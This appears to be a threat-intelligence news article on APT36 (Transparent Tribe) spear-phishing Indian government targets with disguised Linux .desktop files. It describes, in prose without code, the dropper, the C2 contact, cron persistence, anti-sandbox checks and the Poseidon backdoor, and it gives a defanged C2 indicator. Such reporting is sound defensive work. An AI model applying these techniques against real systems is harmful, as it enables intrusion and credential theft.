Transparent Tribe Launches Phishing Campaign Targeting Indian Government Using Weaponized Desktop Shortcuts

The advanced persistent threat (APT) actor known as Transparent Tribe has been observed targeting both Windows and BOSS (Bharat Operating System Solutions) Linux systems with malicious Desktop shortcut files in attacks aimed at Indian Government entities. Initial access is achieved through spear-phishing emails, as reported by CYFIRMA. Linux BOSS environments are specifically targeted via weaponised .desktop shortcut files that, once opened, download and execute malicious payloads. Transparent Tribe, also referred to as APT36, is assessed to be of Pakistani origin. The group, along with its sub-cluster SideCopy, has a storied history of infiltrating Indian government institutions using various remote access trojans (RATs). This latest dual-platform approach demonstrates the adversarial collective’s continued sophistication, allowing it to broaden its targeting footprint and maintain access to compromised environments.

The attack chains commence with phishing emails that contain supposed meeting notices, which are, in reality, booby-trapped Linux desktop shortcut files named “Meeting_Ltr_ID1543ops.pdf.desktop.” These files masquerade as PDF documents to deceive recipients into opening them, leading to the execution of a shell script. The shell script acts as a dropper, fetching a hex-encoded file from an attacker-controlled server and saving it to disk as an ELF binary. Simultaneously, it opens a decoy PDF hosted on Google Drive by launching Mozilla Firefox. The Go-based binary establishes contact with a hard-coded command-and-control (C2) server, modgovindia[.]space:4000, to receive commands, fetch payloads, and exfiltrate data. The malware also ensures persistence through a cron job that executes the main payload automatically after a system reboot or process termination. Cybersecurity company CloudSEK, which independently reported the activity, noted that the malware performs system reconnaissance and is equipped to conduct a series of dummy anti-debugging and anti-sandbox checks to evade emulators and static analyzers. Furthermore, Hunt.io’s analysis revealed that the attacks aim to deploy a known Transparent Tribe backdoor called Poseidon, which facilitates data collection, long-term access, credential harvesting, and potentially lateral movement. APT36’s ability to customise its delivery mechanisms according to the victim’s operating environment significantly increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls. This disclosure follows recent observations of Transparent Tribe actors targeting Indian defence organisations and related government entities using spoofed domains, with the ultimate goal of stealing credentials and two-factor authentication (2FA) codes, believed to be facilitated through spear-phishing emails. 

Categories: Cybersecurity Threats, Targeted Attacks, Malware Techniques 

Tags: Advanced Persistent Threat, Transparent Tribe, APT36, Spear-Phishing, Windows, BOSS Linux, Malicious Payloads, Desktop Shortcut Files, Command-and-Control, Credential Harvesting